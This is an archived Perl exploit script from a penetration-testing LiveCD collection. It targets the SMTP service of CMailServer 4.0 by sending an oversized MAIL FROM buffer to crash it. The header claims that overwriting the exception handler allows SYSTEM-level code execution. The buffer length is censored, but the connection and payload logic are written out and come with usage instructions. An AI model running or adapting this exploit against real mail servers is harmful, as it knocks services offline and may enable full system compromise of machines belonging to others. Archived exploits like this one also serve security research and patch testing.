home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / application / mail / cmailserver / CMailServer-exp.pl.1 < prev    next >
Text File  |  2005-02-12  |  1KB  |  55 lines

  1. #!/usr/bin/perl -w
  2. ##################
  3. # ESMTP CMailServer 4.0.2003.03.27 SMTP Service DoS attack
  4. #
  5. # URL: http://www.infowarfare.dk/
  6. # EMAIL: der@infowarfare.dk
  7. # USAGE: sploit.pl <target ip>
  8. #
  9. # Summary:
  10. #
  11. # The problem is a Buffer Overflow in the SMTP protocol, within the
  12. # ESMTP CMailServer, causing the service to shutdown
  13. # It is then where we can actually overwrite the exception handler on the
  14. stack allowing
  15. # A system compromise with code execution running as SYSTEM.
  16. #
  17. #
  18. # Ive censored some of the source code out. =)
  19. #
  20. # Solution:
  21. # None at this time
  22. #
  23. #
  24.  
  25. use IO::Socket;
  26.  
  27. $target = shift() || "warlab.dk";
  28. my $port = 25;
  29. my $Buffer = "A" x <CENSORED> ; #
  30.  
  31.  
  32. my $sock = IO::Socket::INET->new (
  33.                                     PeerAddr => $target,
  34.                                     PeerPort => $port,
  35.                                     Proto => 'tcp'
  36.                                  ) || die "could not connect: $!";
  37.  
  38. my $banner = <$sock>;
  39. if ($banner !~ /^2.*/)
  40. {
  41.     print STDERR "Error: invalid server response '$banner'.\n";
  42.     exit(1);
  43. }
  44.  
  45. print $sock "HELO $target\r\n";
  46. $resp = <$sock>;
  47.  
  48. print $sock "MAIL FROM: $Buffer\@$target.dk\r\n";
  49. $resp = <$sock>;
  50.  
  51. print $sock "\r\n";
  52. print $sock "\r\n\r\n\r\n\r\n\r\n\r\n";
  53.  
  54. close($sock);
  55.